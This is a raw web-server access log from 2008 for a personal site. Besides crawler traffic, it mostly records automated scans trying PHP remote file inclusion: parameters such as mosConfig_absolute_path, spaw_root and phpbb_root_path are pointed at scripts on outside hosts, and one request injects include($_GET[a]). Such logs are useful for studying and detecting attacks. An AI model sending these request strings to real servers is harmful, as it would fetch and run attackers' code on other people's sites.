204.15.10.22 - - [13/Jul/2008:14:06:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:14:06:25 -0700] "GET /logs/access_080315.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:06:29 -0700] "GET /logs/access_071219.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:06:44 -0700] "GET /logs/access_080104.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:08:06 -0700] "GET /logs/access_071223.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:08:20 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:08:22 -0700] "GET //index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:08:23 -0700] "GET /logs//index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.19 - - [13/Jul/2008:14:08:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.19 - - [13/Jul/2008:14:08:53 -0700] "GET /megumi/minamigrad2k8/IMG_1691.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.98.250.45 - - [13/Jul/2008:14:09:35 -0700] "GET /logs/access.log/port.php?content=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:09:43 -0700] "GET /logs/access_080218.log//index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.27 - - [13/Jul/2008:14:09:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [13/Jul/2008:14:09:47 -0700] "GET /bikes/cb750K6/?D=A HTTP/1.1" 200 1626 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:10:35 -0700] "GET /logs//index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:10:37 -0700] "GET //index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:46 -0700] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:47 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:47 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:10:57 -0700] "GET /logs/access_071130.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:58 -0700] "GET /logs/access_071218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:58 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:10:58 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:11:02 -0700] "GET /logs/access_071223.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:11:11 -0700] "GET /logs/access_080212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:11:13 -0700] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.19 - - [13/Jul/2008:14:11:19 -0700] "GET /megumi/minamigrad2k8/IMG_1652.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:14:12:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:14:12:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:12:20 -0700] "GET /logs/access_080313.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:14:12:25 -0700] "GET /logs//members/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:14:12:25 -0700] "GET //members/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:14:12:42 -0700] "GET /logs/access_080329.log//includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:14:12:42 -0700] "GET //includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:14:12:42 -0700] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:13:15 -0700] "GET /logs/access_071230.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:13:25 -0700] "GET /logs/index.php?seite=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:13:33 -0700] "GET /index.php?seite=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 200 18397 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:13:56 -0700] "GET /logs/access_071223.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:14:00 -0700] "GET /logs/access_080225.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:14:24 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:14:25 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:14:45 -0700] "GET /werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:14:45 -0700] "GET /werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:14:46 -0700] "GET /logs/access_080329.log//?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:14:50 -0700] "GET //?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:14:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 200 55998 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:14:15:16 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.0.18.81 - - [13/Jul/2008:14:15:29 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.18.81 - - [13/Jul/2008:14:15:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.18.81 - - [13/Jul/2008:14:15:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.le-poulailler.com/includes/idd.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:14:15:43 -0700] "GET /logs/errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:14:15:43 -0700] "GET /errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:15:46 -0700] "GET /logs/access_080220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:16:24 -0700] "GET /logs/access_071213.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:16:33 -0700] "GET /logs/access.log/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:14:16:42 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:16:48 -0700] "GET /logs/access.log/index.php?sayfa=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:14:16:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:14:16:50 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
205.234.197.170 - - [13/Jul/2008:14:16:54 -0700] "GET /logs/access_080326.log/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:17:14 -0700] "GET /logs/access_080214.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:14:17:19 -0700] "GET /logs/access_080315.log//includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:17:21 -0700] "GET //index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:17:24 -0700] "GET /logs//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [13/Jul/2008:14:17:26 -0700] "GET /logs/access_080303.log//index.php?canal=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:17:29 -0700] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:14:17:52 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:18:00 -0700] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:14:19:03 -0700] "GET /logs/access.log/errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:14:19:03 -0700] "GET /errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:14:19:03 -0700] "GET /logs/errors.php?error=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:10 -0700] "GET /logs/access_071224.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:11 -0700] "GET /logs/access_080103.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:14 -0700] "GET /logs/access_080117.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:20 -0700] "GET /logs/access_080329.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.18.242.34 - - [13/Jul/2008:14:19:27 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:28 -0700] "GET /logs/access_080218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:19:31 -0700] "GET /logs/access_071221.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:20:06 -0700] "GET /logs/access_080110.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:20:09 -0700] "GET /logs/access_071218.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:20:10 -0700] "GET /logs/access_080117.log/werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:20:10 -0700] "GET /logs/werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:20:13 -0700] "GET /logs/access_080117.log/werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:14:20:14 -0700] "GET /logs/werbungFrame.php?do=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:14:21:28 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:14:21:29 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.122 - - [13/Jul/2008:14:21:29 -0700] "GET /logs/access_080105.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mojir.com/el/moodledata/site/read??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:14:21:30 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:14:21:30 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:14:21:30 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.189.226 - - [13/Jul/2008:14:21:53 -0700] "GET /logs/access_080326.log/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [13/Jul/2008:14:22:02 -0700] "GET //index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 200 18643 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [13/Jul/2008:14:22:08 -0700] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.18.142.194 - - [13/Jul/2008:14:22:14 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.171.18.36 - - [13/Jul/2008:14:22:15 -0700] "GET /logs/access_080225.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.206.130 - - [13/Jul/2008:14:23:19 -0700] "GET //index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/beleaid.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.28 - - [13/Jul/2008:14:23:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.28 - - [13/Jul/2008:14:23:32 -0700] "GET /logs/access_080508.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:14:25:23 -0700] "GET //?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 200 18441 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:14:25:24 -0700] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 200 55998 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:14:25:37 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:14:25:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:25:54 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:25:54 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:25:57 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.173.75 - - [13/Jul/2008:14:26:27 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.171.18.36 - - [13/Jul/2008:14:26:46 -0700] "GET /logs/access_080329.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=35&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:14:27:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:14:27:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:27:27 -0700] "GET /logs/main.php?pagina=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:14:27:32 -0700] "GET /main.php?pagina=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:14:27:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:27:52 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [13/Jul/2008:14:27:52 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
